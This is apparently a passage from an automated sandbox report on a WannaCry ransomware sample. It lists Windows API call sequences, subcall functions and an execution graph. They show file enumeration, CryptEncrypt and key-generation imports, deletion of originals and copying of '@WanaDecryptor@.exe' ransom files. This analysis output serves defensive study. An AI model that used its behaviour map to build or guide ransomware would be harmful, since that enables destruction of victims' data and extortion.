      • Part of subcall function 00401CE8: CloseServiceHandle.ADVAPI32(00000000), ref: 00401D8B
      • Part of subcall function 00401CE8: CloseServiceHandle.ADVAPI32(?), ref: 00401D9E
      • Part of subcall function 00401064: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 004010A8
      • Part of subcall function 00401064: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004010BD
      • Part of subcall function 00401064: TerminateProcess.KERNEL32(00000000,000000FF), ref: 004010CC
      • Part of subcall function 00401064: GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004010DD
      • Part of subcall function 00401064: CloseHandle.KERNEL32(00000000), ref: 004010EC
      • Part of subcall function 00401064: CloseHandle.KERNEL32(00000000), ref: 004010F1
      • Part of subcall function 00401EFF: sprintf.MSVCRT ref: 00401F16
      • Part of subcall function 00401EFF: OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
      • Part of subcall function 00401EFF: Sleep.KERNEL32(000003E8), ref: 00401F40
      • Part of subcall function 00401EFF: CloseHandle.KERNEL32(00000000), ref: 00401F52

    Non-executed Functions

    APIs
    • free.MSVCRT(?,?,00000000,00000000,0040243C,00000000), ref: 00402A15
    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
    • HeapFree.KERNEL32(00000000), ref: 00402A3D
    APIs
    • memcpy.MSVCRT ref: 00406C91
      • Part of subcall function 00405D0E: SetFilePointer.KERNEL32(000000FF,00000002,00000000,00000002,?,00405EF3,00000000), ref: 00405D4A
    • ??2@YAPAXI@Z.MSVCRT ref: 00406D61
      • Part of subcall function 00405D8A: ReadFile.KERNEL32(3C7501F8,00000001,00000000,00000001,00000000), ref: 00405DAB
      • Part of subcall function 00405D8A: memcpy.MSVCRT ref: 00405DD9
    • ??3@YAXPAX@Z.MSVCRT ref: 00406D83
    • strcpy.MSVCRT(?,?), ref: 00406DAB
    • _mbsstr.MSVCRT ref: 00406DDF
    • _mbsstr.MSVCRT ref: 00406DED
    • _mbsstr.MSVCRT ref: 00406DFB
    • _mbsstr.MSVCRT ref: 00406E09
    • strcpy.MSVCRT(00000103,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00406E1B
      • Part of subcall function 00406B23: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00406EE5,?,?), ref: 00406B80
    • LocalFileTimeToFileTime.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00406EF5
    • strcmp.MSVCRT ref: 00406F54
    • ??3@YAXPAX@Z.MSVCRT ref: 0040703C
    • memcpy.MSVCRT ref: 0040704F
      • Part of subcall function 00406A97: free.MSVCRT(000000FF,?,?,?,00000000,?,00406C75,000000FF,?,00000000,00000000), ref: 00406AD8
      • Part of subcall function 00406A97: free.MSVCRT(?,?,?,?,00000000,?,00406C75,000000FF,?,00000000,00000000), ref: 00406AF2
    APIs
      • Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00401A5A
      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,768DDBAE), ref: 00401A77
      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00401A84
      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00401A91
      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00401A9E
      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00401AAB
      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00401AB8
    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
    • GetProcAddress.KERNEL32(00000000,CreateFileW,768DDBAE), ref: 00401749
    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
    • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
    • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
    • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
    • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797
    APIs
    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00401A5A
    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,768DDBAE), ref: 00401A77
    • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00401A84
    • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00401A91
    • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00401A9E
    • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00401AAB
    • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00401AB8
    APIs
      • Part of subcall function 0040671D: malloc.MSVCRT ref: 00406766
      • Part of subcall function 0040671D: malloc.MSVCRT ref: 00406778
      • Part of subcall function 0040671D: free.MSVCRT(00000000), ref: 00406795
      • Part of subcall function 00406A97: free.MSVCRT(000000FF,?,?,?,00000000,?,00406C75,000000FF,?,00000000,00000000), ref: 00406AD8
      • Part of subcall function 00406A97: free.MSVCRT(?,?,?,?,00000000,?,00406C75,000000FF,?,00000000,00000000), ref: 00406AF2
      • Part of subcall function 00406C40: memcpy.MSVCRT ref: 00406C91
      • Part of subcall function 00406C40: ??2@YAPAXI@Z.MSVCRT ref: 00406D61
      • Part of subcall function 00406C40: ??3@YAXPAX@Z.MSVCRT ref: 00406D83
      • Part of subcall function 00406C40: strcpy.MSVCRT(?,?), ref: 00406DAB
      • Part of subcall function 00406C40: _mbsstr.MSVCRT ref: 00406DDF
      • Part of subcall function 00406C40: _mbsstr.MSVCRT ref: 00406DED
      • Part of subcall function 00406C40: _mbsstr.MSVCRT ref: 00406DFB
      • Part of subcall function 00406C40: _mbsstr.MSVCRT ref: 00406E09
      • Part of subcall function 00406C40: strcpy.MSVCRT(00000103,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00406E1B
      • Part of subcall function 00406C40: LocalFileTimeToFileTime.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00406EF5
      • Part of subcall function 00406C40: strcmp.MSVCRT ref: 00406F54
      • Part of subcall function 00406C40: ??3@YAXPAX@Z.MSVCRT ref: 0040703C
      • Part of subcall function 00406C40: memcpy.MSVCRT ref: 0040704F
    • strcpy.MSVCRT(?,00000000,?,?,00000000,00000000,00000000), ref: 004072CF
    • wsprintfA.USER32 ref: 004072FC
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 0040732B
    • wsprintfA.USER32 ref: 0040738F
      • Part of subcall function 00407070: GetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407083
      • Part of subcall function 00407070: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00407091
      • Part of subcall function 00407070: memcpy.MSVCRT ref: 004070CA
      • Part of subcall function 00407070: strcpy.MSVCRT(00000000,00000000,00000000,00000000), ref: 004070FB
      • Part of subcall function 00407070: strcat.MSVCRT(00000000,004073A3,00000000,00000000), ref: 0040710A
      • Part of subcall function 00407070: GetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407118
      • Part of subcall function 00407070: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C
    • ??2@YAPAXI@Z.MSVCRT ref: 004073C9
    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040740B
    • SetFileTime.KERNEL32(00000000,?,?,?), ref: 00407454
    • CloseHandle.KERNEL32(00000000), ref: 00407463
    APIs
    • wcscat.MSVCRT ref: 0040114B
    • RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
    • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
    • strlen.MSVCRT ref: 004011A7
    • RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
    • RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
    • SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
    • RegCloseKey.ADVAPI32(00000000), ref: 00401203
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(768DDBAE), ref: 00402A95
    • _CxxThrowException.MSVCRT(?,0040D570), ref: 00402AA4
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(768DDBAE), ref: 00402ACD
    • _CxxThrowException.MSVCRT(?,0040D570), ref: 00402ADC
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(768DDBAE), ref: 00402AFF
    • _CxxThrowException.MSVCRT(?,0040D570), ref: 00402B0E
    • memcpy.MSVCRT ref: 00402B2A
    • memcpy.MSVCRT ref: 00402B3F
    APIs
      • Part of subcall function 00402457: SetLastError.KERNEL32(0000000D,00402200,?,00000040,?,768DDBAE,00000000), ref: 00402463
    • SetLastError.KERNEL32(000000C1,?,768DDBAE,00000000), ref: 00402219
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,768DDBAE,00000000), ref: 00402291
    • GetProcessHeap.KERNEL32(00000008,0000003C), ref: 00402313
    • HeapAlloc.KERNEL32(00000000), ref: 0040231A
    • memcpy.MSVCRT ref: 004023A7
      • Part of subcall function 00402470: memset.MSVCRT ref: 004024D5
      • Part of subcall function 00402470: memcpy.MSVCRT ref: 0040251F
      • Part of subcall function 004027DF: IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
      • Part of subcall function 004027DF: realloc.MSVCRT ref: 00402854
      • Part of subcall function 004027DF: IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC
      • Part of subcall function 004027DF: SetLastError.KERNEL32(0000007E), ref: 004028FD
      • Part of subcall function 004027DF: SetLastError.KERNEL32(0000007F), ref: 00402916
    • SetLastError.KERNEL32(0000045A), ref: 00402430
      • Part of subcall function 004029CC: free.MSVCRT(?,?,00000000,00000000,0040243C,00000000), ref: 00402A15
      • Part of subcall function 004029CC: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
      • Part of subcall function 004029CC: HeapFree.KERNEL32(00000000), ref: 00402A3D
    APIs
    • FindResourceA.KERNEL32(00000000,0000080A,XIA), ref: 00401DC3
    • LoadResource.KERNEL32(00000000,00000000), ref: 00401DD3
    • LockResource.KERNEL32(00000000), ref: 00401DDE
    • SizeofResource.KERNEL32(00000000,00000000,004020D5), ref: 00401DF1
    • strcmp.MSVCRT ref: 00401E5B
    • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00401E6E
      • Part of subcall function 00407656: ??3@YAXPAX@Z.MSVCRT ref: 00407693
      • Part of subcall function 00407656: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 004010A8
    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004010BD
    • TerminateProcess.KERNEL32(00000000,000000FF), ref: 004010CC
    • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004010DD
    • CloseHandle.KERNEL32(00000000), ref: 004010EC
    • CloseHandle.KERNEL32(00000000), ref: 004010F1
    APIs
    • sprintf.MSVCRT ref: 00401F16
    • OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
    • Sleep.KERNEL32(000003E8), ref: 00401F40
    • CloseHandle.KERNEL32(00000000), ref: 00401F52
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 00403A91
    • _CxxThrowException.MSVCRT(?,0040D570), ref: 00403AA0
    • memcpy.MSVCRT ref: 00403B00
      • Part of subcall function 0040350F: ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 00403528
      • Part of subcall function 0040350F: _CxxThrowException.MSVCRT(?,0040D570), ref: 00403537
      • Part of subcall function 0040350F: memcpy.MSVCRT ref: 004036A9
      • Part of subcall function 00403A28: ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 00403A3D
      • Part of subcall function 00403A28: _CxxThrowException.MSVCRT(?,0040D570), ref: 00403A4C
    • memcpy.MSVCRT ref: 00403B68
      • Part of subcall function 00403797: ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 004037B0
      • Part of subcall function 00403797: _CxxThrowException.MSVCRT(?,0040D570), ref: 004037BF
      • Part of subcall function 00403797: memcpy.MSVCRT ref: 00403937
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574), ref: 00403BC2
    • _CxxThrowException.MSVCRT(?,0040D570), ref: 00403BD1
    • memcpy.MSVCRT ref: 00403C3C
    • memcpy.MSVCRT ref: 00403CA6
    APIs
    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
    • GetFileSizeEx.KERNEL32(00000000,004081E0), ref: 00401529
    • memcmp.MSVCRT ref: 00401572
      • Part of subcall function 004019E1: EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,768DDBAE,?,0000000A), ref: 004019F2
      • Part of subcall function 004019E1: LeaveCriticalSection.KERNEL32(?,?,00401642,?,768DDBAE,?,0000000A), ref: 00401A13
      • Part of subcall function 004019E1: LeaveCriticalSection.KERNEL32(?,?,00401642,?,768DDBAE,?,0000000A), ref: 00401A1D
      • Part of subcall function 004019E1: memcpy.MSVCRT ref: 00401A2C
      • Part of subcall function 00402A76: ??0exception@@QAE@ABQBD@Z.MSVCRT(768DDBAE), ref: 00402A95
      • Part of subcall function 00402A76: _CxxThrowException.MSVCRT(?,0040D570), ref: 00402AA4
      • Part of subcall function 00402A76: ??0exception@@QAE@ABQBD@Z.MSVCRT(768DDBAE), ref: 00402ACD
      • Part of subcall function 00402A76: _CxxThrowException.MSVCRT(?,0040D570), ref: 00402ADC
      • Part of subcall function 00402A76: ??0exception@@QAE@ABQBD@Z.MSVCRT(768DDBAE), ref: 00402AFF
      • Part of subcall function 00402A76: _CxxThrowException.MSVCRT(?,0040D570), ref: 00402B0E
      • Part of subcall function 00402A76: memcpy.MSVCRT ref: 00402B2A
      • Part of subcall function 00402A76: memcpy.MSVCRT ref: 00402B3F
    • GlobalAlloc.KERNEL32(00000000,?,?,0000000A,00000010,?,768DDBAE,?,0000000A), ref: 0040166D
      • Part of subcall function 00403A77: ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 00403A91
      • Part of subcall function 00403A77: _CxxThrowException.MSVCRT(?,0040D570), ref: 00403AA0
      • Part of subcall function 00403A77: memcpy.MSVCRT ref: 00403B00
      • Part of subcall function 00403A77: memcpy.MSVCRT ref: 00403B68
      • Part of subcall function 00403A77: ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574), ref: 00403BC2
      • Part of subcall function 00403A77: _CxxThrowException.MSVCRT(?,0040D570), ref: 00403BD1
      • Part of subcall function 00403A77: memcpy.MSVCRT ref: 00403C3C
      • Part of subcall function 00403A77: memcpy.MSVCRT ref: 00403CA6
    • _local_unwind2.MSVCRT ref: 004016D6
    APIs
    • IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
    • realloc.MSVCRT ref: 00402854
    • IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC
    • SetLastError.KERNEL32(0000007E), ref: 004028FD
    • SetLastError.KERNEL32(0000007F), ref: 00402916
    APIs
    • memcpy.MSVCRT ref: 004070CA
      • Part of subcall function 00407070: GetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407083
      • Part of subcall function 00407070: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00407091
    • strcpy.MSVCRT(00000000,00000000,00000000,00000000), ref: 004070FB
    • strcat.MSVCRT(00000000,004073A3,00000000,00000000), ref: 0040710A
    • GetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407118
    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 00403528
    • _CxxThrowException.MSVCRT(?,0040D570), ref: 00403537
    • memcpy.MSVCRT ref: 004036A9
      • Part of subcall function 00402E7E: ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 00402E98
      • Part of subcall function 00402E7E: _CxxThrowException.MSVCRT(?,0040D570), ref: 00402EA7
    APIs
    • CreateFileA.KERNEL32(00402117,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040193A
    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040194A
    • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00401964
    • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040197D
    • _local_unwind2.MSVCRT ref: 004019A6
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 004037B0
    • _CxxThrowException.MSVCRT(?,0040D570), ref: 004037BF
    • memcpy.MSVCRT ref: 00403937
      • Part of subcall function 004031BC: ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570), ref: 004031D6
      • Part of subcall function 004031BC: _CxxThrowException.MSVCRT(?,0040D570), ref: 004031E5
    APIs
    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00405BFE
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
    • ??2@YAPAXI@Z.MSVCRT ref: 00405C38
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A
    APIs
    • GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,00000000,00000000,?,004074EA,00000000,004020D5,?,00000000,?,004075C0,00401DFE,00401DFE,00000003), ref: 00406BB5
    • strlen.MSVCRT ref: 00406BBC
    • strcat.MSVCRT(00000140,0040F818,?,004074EA,00000000,004020D5,?,00000000,?,004075C0,00401DFE,00401DFE,00000003,00401DFE,00401DFE,00000000), ref: 00406BD7
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,004074EA,00000000,004020D5,?,00000000,?,004075C0,00401DFE,00401DFE,00000003), ref: 00406BEE
      • Part of subcall function 00405BAE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00405BFE
      • Part of subcall function 00405BAE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
      • Part of subcall function 00405BAE: ??2@YAPAXI@Z.MSVCRT ref: 00405C38
      • Part of subcall function 00405BAE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A
      • Part of subcall function 00405FE2: malloc.MSVCRT ref: 0040613E
    APIs
    • __EH_prolog.LIBCMT ref: 004074A9
    • ??2@YAPAXI@Z.MSVCRT ref: 004074B5
      • Part of subcall function 00406B8E: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,00000000,00000000,?,004074EA,00000000,004020D5,?,00000000,?,004075C0,00401DFE,00401DFE,00000003), ref: 00406BB5
      • Part of subcall function 00406B8E: strlen.MSVCRT ref: 00406BBC
      • Part of subcall function 00406B8E: strcat.MSVCRT(00000140,0040F818,?,004074EA,00000000,004020D5,?,00000000,?,004075C0,00401DFE,00401DFE,00000003,00401DFE,00401DFE,00000000), ref: 00406BD7
      • Part of subcall function 00406B8E: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,004074EA,00000000,004020D5,?,00000000,?,004075C0,00401DFE,00401DFE,00000003), ref: 00406BEE
    • ??2@YAPAXI@Z.MSVCRT ref: 0040750B
      • Part of subcall function 00407572: ??3@YAXPAX@Z.MSVCRT ref: 00407587
      • Part of subcall function 00407572: ??3@YAXPAX@Z.MSVCRT ref: 004075A1
    • ??3@YAXPAX@Z.MSVCRT ref: 004074FF
      • Part of subcall function 00407527: strlen.MSVCRT ref: 0040754F
      • Part of subcall function 00407527: ??2@YAPAXI@Z.MSVCRT ref: 00407556
      • Part of subcall function 00407527: strcpy.MSVCRT(00000000,00401DFE,00000001,00401DFE,00000000,00000000,004074D0,?,00000000,?,004075C0,00401DFE,00401DFE,00000003,00401DFE,00401DFE), ref: 00407563
    APIs
    • EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,768DDBAE,?,0000000A), ref: 004019F2
    • LeaveCriticalSection.KERNEL32(?,?,00401642,?,768DDBAE,?,0000000A), ref: 00401A13
    • LeaveCriticalSection.KERNEL32(?,?,00401642,?,768DDBAE,?,0000000A), ref: 00401A1D
    • memcpy.MSVCRT ref: 00401A2C

    Execution Graph

    Execution Coverage:24.8%
    Dynamic/Decrypted Code Coverage:99.7%
    Signature Coverage:24.5%
    Total number of Nodes:795
    Total number of Limit Nodes:42

    Graph

2166 10005781 CreateThread 2165->2166 2166->2165 2167 10005799 CloseHandle 2166->2167 2199 10005680 2166->2199 2167->2165 2185 10001360 AllocateAndInitializeSid 2169->2185 2171 1000489c 2172 100048a9 GetFullPathNameA sprintf 2171->2172 2173 10004913 CreateProcessA 2171->2173 2174 10001080 6 API calls 2172->2174 2176 10004969 CloseHandle CloseHandle 2173->2176 2177 1000497f 2173->2177 2175 10004907 2174->2175 2175->2173 2175->2177 2176->2177 2177->2155 2179 10001360 3 API calls 2178->2179 2180 10004810 2179->2180 2190 100014a0 GetComputerNameW wcslen 2180->2190 2183 10001080 6 API calls 2184 1000487d 2183->2184 2184->2155 2186 100013ab CheckTokenMembership 2185->2186 2187 100013a6 2185->2187 2188 100013c0 2186->2188 2189 100013c4 FreeSid 2186->2189 2187->2171 2188->2189 2189->2171 2191 100014f7 2190->2191 2192 10001517 srand rand 2190->2192 2193 100014fb wcslen 2191->2193 2194 10001533 2192->2194 2193->2192 2193->2193 2195 1000155d 2194->2195 2196 10001548 rand 2194->2196 2197 10001579 sprintf 2195->2197 2198 10001564 rand 2195->2198 2196->2195 2196->2196 2197->2183 2198->2197 2198->2198 2200 10001590 2 API calls 2199->2200 2201 100056a4 2200->2201 2202 10001830 57 API calls 2201->2202 2203 100056c7 2202->2203 2204 100056cb 2203->2204 2205 100056f8 2203->2205 2207 10001680 14 API calls 2204->2207 2206 10005540 191 API calls 2205->2206 2208 1000570d 2206->2208 2209 100056df 2207->2209 2214 10005190 GetDriveTypeW 2208->2214 2211 10005713 2212 10001760 10 API calls 2211->2212 2213 1000571f ExitThread 2212->2213 2215 100052ee 2214->2215 2216 100051cf GlobalAlloc 2214->2216 2215->2211 2216->2215 2217 100051e6 2216->2217 2228 10005120 2217->2228 2219 10005215 CreateFileW 2220 10005239 GlobalFree 2219->2220 2221 1000524a MoveFileExW 2219->2221 2220->2211 2222 100052cd GlobalFree FlushFileBuffers CloseHandle DeleteFileW 2221->2222 2224 10005263 2221->2224 2222->2215 2223 10005269 GetDiskFreeSpaceExW 2223->2222 2223->2224 2224->2222 2224->2223 2225 1000529b WriteFile 
2224->2225 2225->2222 2226 100052b3 Sleep 2225->2226 2226->2225 2227 100052bd Sleep 2226->2227 2227->2222 2227->2223 2229 10005060 14 API calls 2228->2229 2230 10005150 swprintf DeleteFileW 2229->2230 2230->2219 2240 10003560 2241 1000356e ??3@YAXPAX 2240->2241 2242 10003595 ??3@YAXPAX 2240->2242 2241->2241 2241->2242 2248 10006ef0 ??3@YAXPAX 2290 10001660 2291 10001680 14 API calls 2290->2291 2292 10001668 2291->2292 2293 10001678 2292->2293 2294 1000166f ??3@YAXPAX 2292->2294 2294->2293 2249 10004f20 swprintf MultiByteToWideChar CopyFileW 2250 10005024 swprintf CopyFileW 2249->2250 2251 10004fba GetUserNameW _wcsicmp 2249->2251 2251->2250 2252 10005013 SystemParametersInfoW 2251->2252 2252->2250 2297 100053f0 GetUserNameW _wcsicmp 2298 10005452 2297->2298 2299 10005444 2297->2299 2300 100027f0 168 API calls 2298->2300 2301 10005468 2300->2301 2296 10006e16 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 2253 10006cdf 2254 10006cf2 2253->2254 2255 10006cfb 2253->2255 2256 10006d23 2254->2256 2258 10006d43 2254->2258 2259 10006c34 3 API calls 2254->2259 2255->2254 2255->2256 2261 10006c34 2255->2261 2258->2256 2260 10006c34 3 API calls 2258->2260 2259->2258 2260->2256 2262 10006c3c 2261->2262 2263 10006c5d malloc 2262->2263 2264 10006c72 2262->2264 2266 10006c9c 2262->2266 2263->2264 2265 10006c76 _initterm 2263->2265 2264->2254 2265->2264 2266->2264 2267 10006cc9 free 2266->2267 2267->2264

    Executed Functions

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 10002332
      • Part of subcall function 10003730: ??2@YAPAXI@Z.MSVCRT ref: 10003732
    • swprintf.MSVCRT ref: 10002388
    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00000000,?), ref: 1000239E
      • Part of subcall function 10002F70: GetTempFileNameW.KERNELBASE(?,~SD,00000000,00000000), ref: 10002FA1
      • Part of subcall function 10002F70: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000002,00000000), ref: 10002FBB
      • Part of subcall function 10002F70: CloseHandle.KERNEL32(00000000), ref: 10002FC8
      • Part of subcall function 10002F70: DeleteFileW.KERNELBASE(00000000), ref: 10002FD3
    • wcscmp.MSVCRT ref: 10002442
    • wcscmp.MSVCRT ref: 10002459
    • swprintf.MSVCRT(?,%s\%s,?,?), ref: 10002480
    • wcsncpy.MSVCRT ref: 100025EE
      • Part of subcall function 100032C0: _wcsnicmp.MSVCRT ref: 100032CF
      • Part of subcall function 100032C0: wcsstr.MSVCRT ref: 100032E8
      • Part of subcall function 100032C0: _wcsicmp.MSVCRT ref: 10003309
      • Part of subcall function 100032C0: _wcsicmp.MSVCRT ref: 10003323
      • Part of subcall function 100032C0: _wcsicmp.MSVCRT ref: 1000333D
      • Part of subcall function 100032C0: _wcsicmp.MSVCRT ref: 10003357
      • Part of subcall function 100032C0: _wcsicmp.MSVCRT ref: 10003371
      • Part of subcall function 100032C0: wcsstr.MSVCRT ref: 1000338B
      • Part of subcall function 100032C0: wcsstr.MSVCRT ref: 100033A5
      • Part of subcall function 100032C0: _wcsicmp.MSVCRT ref: 100033C3
      • Part of subcall function 100032C0: _wcsicmp.MSVCRT ref: 100033DD
      • Part of subcall function 100032C0: _wcsicmp.MSVCRT ref: 100033F7
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 100024BE
    • wcslen.MSVCRT ref: 100024CC
    • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 100024E2
      • Part of subcall function 100035C0: ??2@YAPAXI@Z.MSVCRT ref: 100035CF
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 10002516
    • wcscmp.MSVCRT ref: 10002535
    • wcscmp.MSVCRT ref: 1000254C
    • wcscmp.MSVCRT ref: 10002563
      • Part of subcall function 10002D60: wcsrchr.MSVCRT ref: 10002D6A
      • Part of subcall function 10002D60: _wcsicmp.MSVCRT ref: 10002D8B
      • Part of subcall function 10002D60: _wcsicmp.MSVCRT ref: 10002D9E
      • Part of subcall function 10002D60: _wcsicmp.MSVCRT ref: 10002DB1
      • Part of subcall function 10002D60: _wcsicmp.MSVCRT ref: 10002DD7
      • Part of subcall function 10002D60: _wcsicmp.MSVCRT ref: 10002DFC
      • Part of subcall function 10002D60: _wcsicmp.MSVCRT ref: 10002E2D
      • Part of subcall function 10002D60: _wcsicmp.MSVCRT ref: 10002E47
    • wcsncpy.MSVCRT ref: 100025D7
    • FindNextFileW.KERNELBASE(?,?), ref: 10002634
    • FindClose.KERNEL32(?), ref: 10002643
    • ??3@YAXPAX@Z.MSVCRT ref: 10002772
      • Part of subcall function 10002940: wcscat.MSVCRT ref: 1000298D
      • Part of subcall function 10002940: wcscat.MSVCRT ref: 1000299B
      • Part of subcall function 10002940: DeleteFileW.KERNEL32(?), ref: 100029B2
      • Part of subcall function 10003760: ??2@YAPAXI@Z.MSVCRT ref: 10003771
    • _wcsnicmp.MSVCRT ref: 100026A7
    • ??3@YAXPAX@Z.MSVCRT ref: 100027A2
      • Part of subcall function 10003200: swprintf.MSVCRT(?,%s\%s,?,@Please_Read_Me@.txt), ref: 1000321A
      • Part of subcall function 10003200: CopyFileW.KERNEL32(@Please_Read_Me@.txt,?,00000001), ref: 1000322F
      • Part of subcall function 10003240: swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe.lnk), ref: 1000325A
      • Part of subcall function 10003240: CopyFileW.KERNEL32(@WanaDecryptor@.exe.lnk,?,00000001), ref: 1000326F
      • Part of subcall function 10003280: swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe), ref: 1000329A
      • Part of subcall function 10003280: CopyFileW.KERNEL32(@WanaDecryptor@.exe,?,00000001), ref: 100032AF
      • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 100023D2
      • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 10002404
    • ??3@YAXPAX@Z.MSVCRT ref: 100027BC
